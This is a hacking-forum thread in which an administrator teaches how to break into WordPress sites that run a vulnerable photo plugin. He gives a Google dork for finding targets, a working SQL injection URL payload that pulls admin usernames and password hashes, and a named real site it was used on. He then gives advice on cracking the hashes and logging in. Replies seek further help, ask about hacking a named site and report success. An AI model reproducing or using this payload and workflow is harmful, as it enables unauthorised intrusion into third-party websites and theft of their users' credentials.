TGS Forum
Hello Guest,

You are currently viewing our boards as a guest, which gives you limited access to view most discussions and access our other features.

By joining this community for FREE, you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content, & many other special features.

Registration is fast, simple & absolutely free, so please, join our community today!


 
PortalHomeFAQRegisterLog in

Share | 
 

 Hack WordPress Sites - The Easy Way

Go down 
AuthorMessage
Malay Akechan
Administrator
Administrator
avatar

Points : 676
Posts : 244
Join date : 2011-04-04
Location : Muzaffarpur, New Delhi
OS Used : Windows 7 & XP
Mobile : Nokia 5233, Samsung Galaxy Tab
Browser : Google Chrome Plus

PostSubject: Hack WordPress Sites - The Easy Way   Thu Sep 01, 2011 7:31 pm

Hi,
Here I tell you how to hack a wordpress website in an easy way.

We will use exploit to hack. yes

First use this dork in Google.

Code:
inurl:"wp-content/plugins/photoracer/viewimg.php?id="

See the Result :-

[You must be registered and logged in to see this image.]


Let's test one of them.


[You must be registered and logged in to see this link.]


Now add this exploit :--

Code:
/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--

Now the url looks like this:-

Code:
http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--

[You must be registered and logged in to see this image.]

Now you can see the username & password. yaaa

Just crack the hash and it's done!

The admin panel is available at:--

Code:
http://Site/wp-login.php

I hope this will help. wave

Feel free to ask your doubts.
Back to top Go down
http://www.tgsforum.in
L30_Ph3niX
Grade - 2
Grade - 2
avatar

Points : 113
Posts : 56
Join date : 2011-08-12
Age : 26
Location : Greater Noida

PostSubject: Re: Hack WordPress Sites - The Easy Way   Fri Sep 02, 2011 1:34 am

rock
Back to top Go down
http://www.encode.co.in
chishik
Newbie
Newbie


Points : 1
Posts : 1
Join date : 2011-09-09

PostSubject: Re: Hack WordPress Sites - The Easy Way   Fri Sep 09, 2011 10:20 pm

so... the next question is how to hack hash? =)
Back to top Go down
L30_Ph3niX
Grade - 2
Grade - 2
avatar

Points : 113
Posts : 56
Join date : 2011-08-12
Age : 26
Location : Greater Noida

PostSubject: Re: Hack WordPress Sites - The Easy Way   Fri Sep 09, 2011 10:54 pm

chishik wrote:
so... the next question is how to hack hash? =)

The HASH is not hacked bro. Because in a HASH, passwords are encrypted. So it needs to be decrypted in passwords....you can use havij/online hash decrypters,etc. there are 100 of options..... yes
Back to top Go down
http://www.encode.co.in
m.tr4v3l3r
Newbie
Newbie


Points : 1
Posts : 1
Join date : 2011-09-16

PostSubject: Re: Hack WordPress Sites - The Easy Way   Fri Sep 16, 2011 6:02 pm

Thanks for this easy and quick tut. However, my question is, how to know which plugin a specific wp website has installed?

thanks
Back to top Go down
puto
Newbie
Newbie


Points : 4
Posts : 4
Join date : 2012-01-24

PostSubject: Re: Hack WordPress Sites - The Easy Way   Tue Jan 24, 2012 1:09 pm

nice post but it is only for wordpress user that uses that plugin? I've tried these and it works, but the only problem is that wordpress uses phpass hash that I think cannot be decrypted, is there any websitge or software that decrpt wordpress phpass? thanks
Back to top Go down
pradeepchampjairamani
Newbie
Newbie


Points : 1
Posts : 1
Join date : 2012-03-24
Age : 26
Location : jaipur,India
OS Used : windows 7
Mobile : samsung champ
Browser : mozilla firefox

PostSubject: Re: Hack WordPress Sites - The Easy Way   Sat Mar 24, 2012 10:57 am

I didnt find any admin or hash inany website.
Back to top Go down
http://www.hackthehacker.in
Malay Akechan
Administrator
Administrator
avatar

Points : 676
Posts : 244
Join date : 2011-04-04
Location : Muzaffarpur, New Delhi
OS Used : Windows 7 & XP
Mobile : Nokia 5233, Samsung Galaxy Tab
Browser : Google Chrome Plus

PostSubject: Re: Hack WordPress Sites - The Easy Way   Sat Mar 24, 2012 2:59 pm

pradeepchampjairamani wrote:
I didnt find any admin or hash inany website.

Did you use the mentioned dork. Vulnerable sites appear in the Google search only if you use the dork. :)
Back to top Go down
http://www.tgsforum.in
suolmasta
Newbie
Newbie


Points : 1
Posts : 1
Join date : 2012-05-04

PostSubject: Re: Hack WordPress Sites - The Easy Way   Fri May 04, 2012 2:13 am

I´m doing this tutorial just to understand how a boy from Turkia hack a friend site so easy...
I get this code from the google request:

posted on 9
da :ramal
-admin-$P$B9KthdRbE99PNX/lwJYI.BdogXmhf9.-EMAILADDRESS:1fkbXGVssvUPQ3H0NTv2

So, wich one is the hash that give to me the password and username?
I already try with
$P$B9KthdRbE99PNX/lwJYI.BdogXmhf9
and
1fkbXGVssvUPQ3H0NTv2

but nothing
Did you recomend some hash decrypter???
Back to top Go down
Malay Akechan
Administrator
Administrator
avatar

Points : 676
Posts : 244
Join date : 2011-04-04
Location : Muzaffarpur, New Delhi
OS Used : Windows 7 & XP
Mobile : Nokia 5233, Samsung Galaxy Tab
Browser : Google Chrome Plus

PostSubject: Re: Hack WordPress Sites - The Easy Way   Fri May 04, 2012 3:05 am

You can use HASHCAT for this purpose.
Back to top Go down
http://www.tgsforum.in
SirDarknight
Newbie
Newbie


Points : 2
Posts : 2
Join date : 2012-05-05

PostSubject: Re: Hack WordPress Sites - The Easy Way   Sat May 05, 2012 6:33 pm

I got nothing found after adding the code :

Code:
+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
Back to top Go down
Malay Akechan
Administrator
Administrator
avatar

Points : 676
Posts : 244
Join date : 2011-04-04
Location : Muzaffarpur, New Delhi
OS Used : Windows 7 & XP
Mobile : Nokia 5233, Samsung Galaxy Tab
Browser : Google Chrome Plus

PostSubject: Re: Hack WordPress Sites - The Easy Way   Tue May 08, 2012 2:04 am

SirDarknight wrote:
I got nothing found after adding the code :

Code:
+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--

Then the site is not vulnerable. Use vulnerability scanners in order to find vulnerable sites in an efffective way. Then use the exploit. :)
Back to top Go down
http://www.tgsforum.in
remymartinviii
Newbie
Newbie


Points : 1
Posts : 1
Join date : 2012-02-16

PostSubject: Re: Hack WordPress Sites - The Easy Way   Tue May 08, 2012 4:24 pm

how can i get hashcat? after i downloaded the zip and extracted it, i tried running the application and the error message says that some .dll files are missing.
Back to top Go down
rohitshrm040
Newbie
Newbie


Points : 1
Posts : 1
Join date : 2012-05-21

PostSubject: Re: Hack WordPress Sites - The Easy Way   Mon May 21, 2012 9:25 am

how to hack this site tel me www dot newsresults dot in pls............................ its on wordpres
Back to top Go down
Srihari Rao
Newbie
Newbie
avatar

Points : 20
Posts : 10
Join date : 2011-07-05
Age : 24
Location : Bellary

PostSubject: Re: Hack WordPress Sites - The Easy Way   Mon May 21, 2012 9:41 am

rock Bro i am sure that you will give free hacking courses for your patients.. :D rock
Back to top Go down
http://www.electronictweets.blogspot.com
Malay Akechan
Administrator
Administrator
avatar

Points : 676
Posts : 244
Join date : 2011-04-04
Location : Muzaffarpur, New Delhi
OS Used : Windows 7 & XP
Mobile : Nokia 5233, Samsung Galaxy Tab
Browser : Google Chrome Plus

PostSubject: Re: Hack WordPress Sites - The Easy Way   Mon May 21, 2012 6:30 pm

Srihari Rao wrote:
rock Bro i am sure that you will give free hacking courses for your patients.. :D rock


Sure. lol!
Back to top Go down
http://www.tgsforum.in
qmmhs
Newbie
Newbie


Points : 1
Posts : 1
Join date : 2012-08-16

PostSubject: Re: Hack WordPress Sites - The Easy Way   Thu Aug 16, 2012 6:02 am

awesome task!
Back to top Go down
adminss
Newbie
Newbie


Points : 1
Posts : 1
Join date : 2012-10-17

PostSubject: Re: Hack WordPress Sites - The Easy Way   Wed Oct 17, 2012 10:39 am

Thanks... worked
Back to top Go down
filmiim
Newbie
Newbie


Points : 1
Posts : 1
Join date : 2012-11-11

PostSubject: Re: Hack WordPress Sites - The Easy Way   Sun Nov 11, 2012 4:11 pm

Does this work only with this plugin?
Back to top Go down
anniyan
Newbie
Newbie


Points : 1
Posts : 1
Join date : 2012-12-27

PostSubject: Re: Hack WordPress Sites - The Easy Way   Thu Dec 27, 2012 11:56 am

cant use this way ready...
Back to top Go down
Malay Akechan
Administrator
Administrator
avatar

Points : 676
Posts : 244
Join date : 2011-04-04
Location : Muzaffarpur, New Delhi
OS Used : Windows 7 & XP
Mobile : Nokia 5233, Samsung Galaxy Tab
Browser : Google Chrome Plus

PostSubject: Re: Hack WordPress Sites - The Easy Way   Thu Dec 27, 2012 1:21 pm

I'm not sure whether this method is still working or not (Wordpress keeps on upgrading security).

But you can still give this a try because it might do the job! yes
Back to top Go down
http://www.tgsforum.in
iqee3
Newbie
Newbie


Points : 1
Posts : 1
Join date : 2013-04-09

PostSubject: Re: Hack WordPress Sites - The Easy Way   Tue Apr 09, 2013 6:57 pm

Thank for this information
Back to top Go down
joke1972
Newbie
Newbie


Points : 1
Posts : 1
Join date : 2013-04-11

PostSubject: Re: Hack WordPress Sites - The Easy Way   Thu Apr 11, 2013 9:40 am

I didnt find any admin or hash inany website.
Back to top Go down
SupremoPV
Newbie
Newbie


Points : 1
Posts : 1
Join date : 2013-04-11

PostSubject: Re: Hack WordPress Sites - The Easy Way   Thu Apr 11, 2013 11:04 pm

Do anyone knows what is the new method to hack a Wordpress site? PM me if you know or you know someone who know.
Back to top Go down
Sponsored content




PostSubject: Re: Hack WordPress Sites - The Easy Way   

Back to top Go down
 
Hack WordPress Sites - The Easy Way
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
TGS Forum :: Hacking Section :: Hacking Tutorials-
Jump to:  
Free forum | © phpBB | Free forum support | Contact | Report an abuse | Free forum